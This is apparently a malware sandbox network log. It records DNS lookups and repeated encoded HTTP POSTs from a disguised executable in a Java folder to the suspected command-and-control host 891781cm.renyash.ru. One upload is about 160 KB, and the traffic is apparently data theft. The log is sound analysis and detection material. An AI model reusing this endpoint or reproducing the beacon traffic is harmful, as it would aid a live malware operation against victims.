                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Jan 1, 2025 15:02:11.104135990 CET192.168.2.41.1.1.10xcd90Standard query (0)891781cm.renyash.ruA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Jan 1, 2025 15:02:11.114093065 CET1.1.1.1192.168.2.40xcd90No error (0)891781cm.renyash.ru104.21.38.84A (IP address)IN (0x0001)false
                                                                                                                  Jan 1, 2025 15:02:11.114093065 CET1.1.1.1192.168.2.40xcd90No error (0)891781cm.renyash.ru172.67.220.198A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • 891781cm.renyash.ru

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.449730104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:11.170650005 CET343OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 344
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:11.525337934 CET344OUTData Raw: 05 02 04 05 06 0e 01 03 05 06 02 01 02 01 01 05 00 00 05 08 02 05 03 0d 03 05 0e 04 07 00 01 08 0d 52 06 00 00 0c 06 07 0b 0a 06 0a 05 54 05 56 03 03 0e 0b 0a 00 06 0a 07 02 03 0c 04 55 07 5a 02 01 0a 09 05 01 04 54 0c 0f 0e 05 0d 0d 0f 05 06 0d
                                                                                                                  Data Ascii: RTVUZT\L~p[Zw~\ul@R\]`ltL~soXoRsJlYbhSSvg|Lj_~V@{SzA}be
                                                                                                                  Jan 1, 2025 15:02:11.627216101 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:11.909101963 CET1236INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vnCUxKGwD0i1cktRzqYp7nCHlbo7BNjJwU8lEmVrcz6czSgixg49gLGeygTlQ2EUaUQew3hwSSYENHsaQVgbZuMmY2aQ9VP%2BUzro2wbl3z0L0uN0n4ttrDIc31%2Brhvj1k7If2gQT"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bae680f5e73-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3324&min_rtt=1612&rtt_var=4028&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=687&delivery_rate=95368&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 35 35 30 0d 0a 56 4a 7e 05 7a 6d 60 58 6c 5c 70 03 6b 71 7b 49 69 67 64 55 68 06 6a 51 6d 4d 73 58 6a 62 70 00 74 60 7e 53 79 58 79 06 76 66 56 45 7c 71 78 01 55 4b 71 41 74 5b 68 58 68 71 79 4c 68 64 66 0c 78 76 78 0a 7c 70 6b 00 61 5b 71 02 74 62 75 04 7f 58 66 03 7e 42 5d 53 69 01 60 5a 75 4c 7b 06 7c 5b 75 05 6a 60 75 06 78 74 6c 4c 79 77 7c 07 78 6e 78 58 6e 61 7c 02 6c 05 61 5b 7c 60 7c 02 79 74 70 06 6a 5b 64 5f 75 5f 74 05 7a 51 41 5b 7f 64 78 0a 68 71 5c 52 76 52 5a 06 7a 6c 5d 5d 60 5e 5c 4e 79 71 58 59 69 6c 58 4c 7b 61 57 5a 61 60 67 44 62 58 7f 5c 60 61 62 50 7e 5d 79 5f 77 4c 6d 4f 61 65 55 50 7e 7c 66 58 60 6f 74 04 7c 63 6c 01 78 6f 6c 5a 7a 60 66 4a 6b 6d 7c 08 60 59 6c 02 7e 62 75 50 7e 53 7f 08 7b 6e 66 41 7d 72 71 4d 7b 5d 46 51 7d 6c 55 55 7d 63 7c 09 7e 77 62 00 6f 7d 5e 5f 7b 72 7b 5c 7e 61 60 5e 7d 59 51 40 7e 70 65 40 79 4d 6b 5f 69 5c 52 49 63 5a 75 51 7b 5c 79 49 76 76 60 4a 7d 76 68 40 7f 66 79 08 77 5c 55 4b 7c 5c 61 4c 7d 77 54 0c 78 66 52 4f 7e 63 7b 03 75 4c 5b 05 74 [TRUNCATED]
                                                                                                                  Data Ascii: 550VJ~zm`Xl\pkq{IigdUhjQmMsXjbpt`~SyXyvfVE|qxUKqAt[hXhqyLhdfxvx|pka[qtbuXf~B]Si`ZuL{|[uj`uxtlLyw|xnxXna|la[|`|ytpj[d_u_tzQA[dxhq\RvRZzl]]`^\NyqXYilXL{aWZa`gDbX\`abP~]y_wLmOaeUP~|fX`ot|clxolZz`fJkm|`Yl~buP~S{nfA}rqM{]FQ}lUU}c|~wbo}^_{r{\~a`^}YQ@~pe@yMk_i\RIcZuQ{\yIvv`J}vh@fyw\UK|\aL}wTxfRO~c{uL[tqaG~qT~R|gcv_{\_J}^iK{YhLxI^ymzr`xM~LN|{gR}L]OuOxI}RsK|IZA|_avllNzlht^nzaqJ}l~zqjuMsJvqxwarA
                                                                                                                  Jan 1, 2025 15:02:11.909121990 CET224INData Raw: 7f 70 7a 07 74 4c 71 4c 76 75 68 0d 7f 6c 71 4d 74 52 5a 42 7f 63 60 44 78 42 7f 01 7a 70 62 49 7c 43 5e 43 76 67 52 02 7e 62 76 0b 7d 43 67 09 78 6d 76 4f 7f 62 57 4f 7c 5e 78 4f 7f 52 52 08 7e 4e 70 09 7d 49 6e 05 78 43 6b 44 79 72 7c 4b 7c 71
                                                                                                                  Data Ascii: pztLqLvuhlqMtRZBc`DxBzpbI|C^CvgR~bv}CgxmvObWO|^xORR~Np}InxCkDyr|K|qc}IQA|Ni@z]x}r`Hwseyauwfp~HZ}faAw\kD}ryBYXyfhB~cvr[tq}aX|pgDvqUIxrS}NuDyg`ywxy}gzb|xs~{]NZ{t`K}qxZvqQZj{kY`qq@w|p
                                                                                                                  Jan 1, 2025 15:02:11.909133911 CET699INData Raw: 78 6c 7b 58 77 59 66 4e 7a 07 7d 03 7d 52 66 5f 7a 5c 79 05 76 7f 78 42 61 07 67 78 5b 4c 7e 4a 78 59 76 40 76 72 69 05 75 4b 5e 0a 6b 6c 5b 4c 60 42 5e 4c 7f 5d 5e 01 6c 7c 5e 5b 6c 63 79 5f 68 7d 74 40 63 67 5d 5e 7e 5b 72 42 7a 53 59 51 67 61
                                                                                                                  Data Ascii: xl{XwYfNz}}Rf_z\yvxBagx[L~JxYv@vriuK^kl[L`B^L]^l|^[lcy_h}t@cg]^~[rBzSYQgaeZS[_P|Tko@jaYW{uCln|AlncKkmxik|lRcHmWZ_QgBcb~SVX~_Z\cKjeF^|qrStq|_|b[M|wjxfR}ctYuLv_vbmGqzF}cP~t`[vL{POr^icDT{oZWdSUTdISacKQt~{^^FxwlF~bMt_p|k
                                                                                                                  Jan 1, 2025 15:02:11.943018913 CET319OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 384
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:12.040903091 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:12.041290045 CET384OUTData Raw: 50 55 5d 56 5a 5a 51 55 55 5a 54 59 51 5d 55 5d 58 5f 5c 5a 59 53 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PU]VZZQUUZTYQ]U]X_\ZYSRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (Z#%-9(>+_$$)- X3*Q$<_/(](S><#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:12.296453953 CET965INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:12 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ly0xDUlVn8bbkVWf%2BkU8nSORKWaJ%2Bo8S%2BmVSe7aYq%2FSGvWEPLTZtXF1K1GL1%2FmAzMbiTR1Ngbr8HkUHJw7sxdY2T6dMIF%2F7p0PGP7S6bVzFqcC6XnbLAAN%2F7xjfHMHex6jwOJuf5"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bb0fa4f5e73-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5696&min_rtt=1612&rtt_var=7716&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2209&recv_bytes=1390&delivery_rate=2559906&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 1d 24 02 27 14 28 07 36 58 2d 3c 30 0e 31 3c 22 5e 25 33 24 1d 24 2d 39 14 3a 2b 23 04 3f 3b 30 06 26 5c 21 12 34 31 21 02 32 0c 2e 5d 04 1d 26 03 3f 2a 00 14 28 3f 0c 00 3d 22 0d 07 24 19 24 05 31 34 0e 13 30 13 08 5c 21 0b 27 55 33 0d 2f 0f 2b 2a 2f 13 27 3e 3d 08 23 00 2e 57 0d 12 22 1e 26 10 39 57 29 1f 01 0a 22 3f 33 1f 27 01 0a 0c 24 2c 0e 1f 20 38 0c 10 3e 2f 01 00 22 09 25 56 24 04 27 13 22 17 2d 1e 22 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"$'(6X-<01<"^%3$$-9:+#?;0&\!41!2.]&?*(?="$$140\!'U3/+*/'>=#.W"&9W)"?3'$, 8>/"%V$'"-""T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.449733104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:12.676310062 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1792
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:13.024851084 CET1792OUTData Raw: 55 52 5d 50 5f 5a 51 5a 55 5a 54 59 51 52 55 50 58 52 5c 55 59 5d 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UR]P_ZQZUZTYQRUPXR\UY]R^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(X#]%_&>6*.70$U-$&'<'_,.<.8V><#^!'^)
                                                                                                                  Jan 1, 2025 15:02:13.124960899 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:13.397224903 CET957INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zcTN614DNct%2B6%2FwILrmSARmGc%2BBVPCcEbjq6pVJscph28N5mH8rWG78ira0wQ1k06ijIOehkvQCTZ%2F0ViXaRid5tA5iHNaybVCKEQhgMaXLQZoRmbPZVNPtBg%2BVwJTPULzgdOZjt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bb7bc5c5e74-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4445&min_rtt=2280&rtt_var=5185&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2136&delivery_rate=74482&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 21 0d 24 28 33 14 2b 2e 36 5b 38 2c 2f 54 24 3f 3d 04 33 09 30 5a 25 3d 3a 01 2d 16 30 59 3e 3b 01 12 26 5c 29 13 20 32 35 00 25 0c 2e 5d 04 1d 25 10 3f 29 2e 58 3c 11 32 00 3e 31 23 04 26 37 34 05 25 0a 0a 5b 30 3d 21 04 20 31 24 0b 30 20 2c 56 2b 2a 3c 06 27 03 26 1c 23 3a 2e 57 0d 12 22 1d 24 2e 35 53 3e 57 20 1e 22 02 3f 57 27 2f 34 08 27 3c 30 57 37 06 26 1d 29 11 0e 5d 21 27 2d 1c 24 2a 38 07 35 39 2e 01 36 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!$(3+.6[8,/T$?=30Z%=:-0Y>;&\) 25%.]%?).X<2>1#&74%[0=! 1$0 ,V+*<'&#:.W"$.5S>W "?W'/4'<0W7&)]!'-$*859.63"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.449734104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:12.691539049 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:13.040324926 CET1072OUTData Raw: 55 52 5d 54 5a 5f 51 55 55 5a 54 59 51 5a 55 53 58 59 5c 5e 59 50 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UR]TZ_QUUZTYQZUSXY\^YPRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (!8-26=7_$42V:,0>038-;?>0U)<#^!'^)#
                                                                                                                  Jan 1, 2025 15:02:13.135201931 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:13.398500919 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9pitw%2FEtdAKxsjK8F2Zp%2Bkk%2B2L%2BkfkG69aeGyT0ljxEhKsjFKZFVHxrK4y0UvVVib9llI4DLWBiDuAt9jR2PenSMlSseRfreegxQphiNp0t1h4LWe0wayr9c%2FS0lJXT%2BgChyceRk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bb7cf7043bc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8456&min_rtt=1822&rtt_var=13952&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=26593&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.449735104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:13.557497978 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.449736104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:13.972496033 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:14.325496912 CET1072OUTData Raw: 55 54 58 55 5a 5a 54 5a 55 5a 54 59 51 5a 55 53 58 53 5c 5e 59 50 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXUZZTZUZTYQZUSXS\^YPR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y?[!(-Z25](= 3$=-'%0#Y--(+>0T=#^!'^)#
                                                                                                                  Jan 1, 2025 15:02:14.416939020 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:14.692692041 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pd27AKpVX%2FBtUYj3rWC3BWG2HHxV5HSLAFUEkurOyiaLo2C3gcgiNVBXEsL6lHeBUWDdM%2Fr%2BkNlKMNLZlEJqPBI%2BR3GOkG4rbo7k1LSsjBAo07Iti5YSoptguzKJcRfBfQOu597L"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bbfdcf47c7e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1903&min_rtt=1859&rtt_var=785&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=660334&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.449738104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:14.831027985 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:15.186120033 CET1072OUTData Raw: 50 53 5d 56 5a 5a 51 54 55 5a 54 59 51 58 55 55 58 53 5c 54 59 56 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PS]VZZQTUZTYQXUUXS\TYVR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)/5] >%!X)>7Y$9:$?3Y!0;>?><W*<#^!'^)+
                                                                                                                  Jan 1, 2025 15:02:15.282783031 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:15.536407948 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VkKnrRu0eKI%2B1OC9GE3MY80WFuBcHT%2FOcBAnnKjhDYaMt2OUcNiqAU1MYBUXG8J9xpCNgGbGxXJpiydiRI7fnfQjd252vguGhQ%2Bk2S8gXa3%2BH%2Bx78mPYZTB69onGkrldvLWsya8e"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bc53ecf435d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3916&min_rtt=1849&rtt_var=4828&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=79399&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.449741104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:15.638679028 CET346OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 159884
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.449742104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:15.686604977 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:16.040594101 CET1072OUTData Raw: 55 51 5d 50 5f 59 54 59 55 5a 54 59 51 5e 55 52 58 5d 5c 55 59 51 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQ]P_YTYUZTYQ^URX]\UYQR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(/>!+.%\)($-X%?!'#Y8>$_?=4S*#^!'^)3
                                                                                                                  Jan 1, 2025 15:02:16.160638094 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:16.421458960 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
